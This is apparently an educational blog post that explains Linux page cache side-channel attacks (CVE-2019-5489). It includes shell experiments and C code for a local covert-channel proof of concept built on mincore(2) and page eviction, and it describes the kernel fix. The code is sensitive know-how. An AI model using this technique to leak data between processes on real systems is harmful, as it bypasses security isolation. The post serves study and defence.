[LINUX] About Page Cache Attacks (CVE-2019-5489)

This article is the day-15 entry of the Kobe University Advent Calendar 2019.

Introduction

The purpose of this article is to summarize **page cache attacks** [^1], which were announced at CCS 2019 and registered as CVE-2019-5489, and to implement a simple PoC. The implemented PoC can be found at Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux.

The page cache is the disk cache used by the Linux kernel (a software mechanism for keeping data stored on disk in RAM), and page cache attacks are side-channel attacks that exploit it. Unlike side-channel attacks on the CPU cache (a hardware cache), such as Flush+Reload [^2], these attacks use the page cache (a software cache), so they have no hardware dependency. In addition, page cache attacks need no timer to measure time; the return value of a system call suffices. Side-channel attacks against software caches are also known against web browser caches, from which information such as browsing history can be extracted [^3].

Page cache attacks [^1] presents several example attacks in local and remote environments: for instance, a covert channel (an attack that transfers sensitive information between processes that are not allowed to communicate by security policy), ASLR bypass, and recovery of keystroke timings. This time, I implemented a PoC of a covert channel in a local Linux environment.

About page cache

A certain understanding of the page cache is necessary for creating the PoC, so let us explain it and experiment with it. The page cache is a software cache used by the Linux kernel to cache data on disk. On a file read/write request from a user process, the kernel first looks in the page cache; if the data is not there, it accesses the disk and adds the read data to the page cache. This allows later processes that use the same file to use the data in the page cache without accessing the disk. The important point is that **when you access a file, the read data is added to the page cache**.

Also, since the page cache lives in RAM, its capacity is finite; when it runs short, some pages must be evicted from the page cache. The page cache is managed with two lists, an active list (active page LRU list) and an inactive list (inactive page LRU list): recently accessed pages are collected in the active list, pages that have not been accessed for a long time are kept in the inactive list, and pages are evicted from the inactive list. As shown in the figure below, a page moves between states when it is accessed. For example, the first access to a page moves it from state 1 to state 2; if the page is still in state 2 and is accessed again, it moves from state 2 to state 3 and enters the active list. In other words, **a page enters the active list after two or more accesses**.

Move pages between LRU lists

Let's actually experiment with movement between the active and inactive lists. First, disable swap, create a 1.0 GB file, and clear the page cache to set up a test environment. (If your machine has little RAM, it may be better to reduce the size of the created file.)

$ sudo swapoff -a
$ dd if=/dev/zero of=tmp bs=1M count=1000
$ sudo sh -c "echo 1 > /proc/sys/vm/drop_caches"

Next, alternately run a command that shows how much of the page cache is on the active and inactive lists and a command that reads the 1.0 GB file created above.

$ cat /proc/meminfo | grep file
Active(file):     314140 kB
Inactive(file):    56372 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     314140 kB
Inactive(file):  1080620 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):    1338020 kB
Inactive(file):    56740 kB

The first read of the file increases the size of the inactive list by about 1.0 GB; the second read shrinks the inactive list by about 1.0 GB and grows the active list by about 1.0 GB. In other words, the first read puts the file in the inactive list and the second read moves it to the active list, consistent with the explanation above. A similar experiment with a larger file (16.0 GB) gives the following results. On the first read, the inactive list is not large enough for the whole file to survive in the page cache. Therefore the page cache is not hit on the second read, and the size of the active list does not increase.

$ dd if=/dev/zero of=tmp bs=1M count=16000
$ sudo sh -c "echo 1 > /proc/sys/vm/drop_caches"
$ cat /proc/meminfo | grep file
Active(file):     298924 kB
Inactive(file):    21148 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     297080 kB
Inactive(file):  2090576 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     296684 kB
Inactive(file):  2088860 kB

About page cache attacks

attack_overview.png

An overview of page cache attacks will be explained using the figure above.

The prerequisite for this attack is that **the attacker's program and the victim's program can access the same page cache**. This is possible when the attacker's and victim's programs run on the same operating system and use the same shared libraries or files. In the figure above, `libfoobar.so` is shared among the three programs (`Victim #1 Program`, `Victim #2 Program`, `Attack Program`), so the page cache holding the data of `libfoobar.so` that `Victim #1 Program` accessed to execute the `foo()` function can also be accessed from `Attack Program`.

With page cache attacks, **an attacker can use information about whether a page is in the page cache to learn the behavior of the target program**. In the figure above, `Victim #1 Program` calls the `foo()` function at t = 1 and t = 4, and `Attack Program` checks whether page #0 (0x0000–0x0fff) of `libfoobar.so`, which contains the `foo()` function, is in the page cache. Since `Attack Program` observes that #0 is not in the page cache at t = 0 but is in the page cache at t = 1, it can tell that the `foo()` function was called. Then, by evicting page #0 from the page cache in preparation for the next call, it can tell that `foo()` was called again at t = 4.

So how does an attacker know whether a page is in the page cache, and how does the attacker get a page out of the page cache? Whether a page is in the page cache can be determined with the **`mincore(2)` system call**. `mincore(2)` returns flags indicating whether pages of the calling process's virtual memory are resident in RAM, and it causes no disk access, so it is an easy way to check for presence in the page cache. Alternatively, instead of `mincore(2)`, presence can be judged from the time a page fault takes: there is a large, exploitable time difference between a soft page fault (which merely maps a page already in the page cache) and a regular page fault (which loads data from disk). As for eviction, **repeatedly accessing a large amount of file data** pushes files that are already in the page cache out of it. However, this takes much longer than calling `mincore(2)` and is the bottleneck of this attack. A method more efficient than simply accessing many files is introduced in the paper [^1].

In this way, **attackers can observe the behavior of other programs through side channels such as `mincore(2)` and the time taken by page faults**. In the example above we can only learn when the `foo()` function was called, but if the attacker can observe the behavior of a program that depends on sensitive information, the attacker can learn that sensitive information.

Implementing a covert channel using page cache attacks

A covert channel is a type of attack that creates a way to transfer sensitive information between processes that are not allowed to communicate by security policy. Page cache attacks let one process send information to another through **whether a page is in the page cache**.

I created a PoC that actually sends data from a sending process to a receiving process. The program is located at Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux. The sending and receiving processes use the same shared library: the sending process changes which functions in the shared library it calls depending on the data (the sensitive data) to send, and the receiving process reads the state of the page cache, determines which functions' pages are cached, and recovers the data. In addition, the signals used to synchronize transmission and reception between the processes, two Valid signals (used by the sender) and Ready signals (used by the receiver), are also sent and received through the page cache state of the shared library. Two Valid signals are needed so that the Valid signals of two consecutive transmissions do not collide.

In the following, the code for inter-process synchronization is omitted; only the code that sends and receives data through the page cache state is described.

Creating a shared library

The shared library was simply created with 64 pages of alignment between functions, as shown below. Calling a function brings the corresponding page into the page cache, which can then be used for the side channel. The reason the alignment is not a single page is so that, when a function is called, prefetching does not pull pages containing other functions into the page cache. This time I used my own library, which is easy to attack, but I think the same can be done with other shared libraries such as libc.

#define SIZE (4096 * 64)

__attribute__ ((aligned(SIZE))) int func_0() { return 0; }
__attribute__ ((aligned(SIZE))) int func_1() { return 1; }
__attribute__ ((aligned(SIZE))) int func_2() { return 2; }
__attribute__ ((aligned(SIZE))) int func_3() { return 3; }
__attribute__ ((aligned(SIZE))) int func_4() { return 4; }
__attribute__ ((aligned(SIZE))) int func_5() { return 5; }
__attribute__ ((aligned(SIZE))) int func_6() { return 6; }
__attribute__ ((aligned(SIZE))) int func_7() { return 7; }

Sending data

As in the program below, the functions to call are chosen according to the data you want to send. For example, when sending `A`, the value is 0x41 (= 0b01000001), so `func_0()` and `func_6()` are called.

void send_data(const int index) {
	char c = key[index];

	if (c & (1 << 0)) {
		func_0();
	}
	if (c & (1 << 1)) {
		func_1();
	}
        ...
	if (c & (1 << 7)) {
		func_7();
	}
}

Receiving data

As in the program below, the `mincore(2)` system call is used to get the page cache state of the page containing each function and to recover the data. For example, if `check_state(func_1)` and `check_state(func_6)` return 1, the recovered data is 0x42 (= 0b01000010), indicating that the sender sent `B`.

int check_state(void* addr) {
	size_t page_size = sysconf(_SC_PAGESIZE);
	unsigned char vec[1] = {0};
	int res = mincore(addr, page_size, vec);
	assert(res == 0);
	return vec[0] & 1;
}

char read_data() {
	char data = 0;
	if (check_state(func_0)) {
		data |= (1 << 0);
	}
	if (check_state(func_1)) {
		data |= (1 << 1);
	}
	...
	if (check_state(func_7)) {
		data |= (1 << 7);
	}
	return data;
}

Page cache eviction

Pages can be evicted by repeatedly accessing a sufficiently large file (`file`), as in the program below. However, since the shared library's pages may be on the active list, the file is read twice so that pages on the active list can also be evicted. (In fact, eviction did not succeed with a single read.) This finally pushes the pages of `func_0()`, `func_1()`, ..., `func_7()` out of the page cache, after which data transmission can be repeated.

int cache_count() {
	int count = 0;
	count += check_state(func_0);
        ...
	count += check_state(func_7);
	return count;
}

void evict() {
	FILE *file = fopen("file", "r");
	assert(file != NULL);
	fseek(file, 0, SEEK_END);
	long fsize = ftell(file);
	fseek(file, 0, SEEK_SET);

	char* buf = malloc(SIZE * sizeof(char));

	off_t chunk = 0;
	int    flag = 0;
	while (chunk < fsize) {
		if (cache_count() == 0) {
			flag = 1;
			break;
		}
		fread(buf, sizeof(char), SIZE, file); // first read
		fseek(file, -SIZE, SEEK_CUR);
		fread(buf, sizeof(char), SIZE, file); // second read
		chunk += SIZE;
	}

	if (!flag) {
		printf("Failed to evict page cache\n");
		debug_print();
		exit(0);
	}

	free(buf);
	fclose(file);
}

Page cache attacks mitigation

In Linux 5.0 and later, the behavior of the `mincore(2)` system call changed. First, the commit "Change mincore() to count "mapped" pages rather than "cached" pages" made `mincore(2)` return whether a page is mapped rather than whether it is in the page cache. Because this broke existing programs that use `mincore(2)`, it was undone by the commit "Revert "Change mincore() to count "mapped" pages rather than "cached" pages"" (30bac164aca750892b93eef350439a0562a68647). Subsequently, the commit "mm/mincore.c: make mincore() more conservative" changed `mincore(2)` to return the page cache state only when the caller has write permission for the mapped file. This makes it difficult to send and receive data through shared libraries and other shared files.

Reference
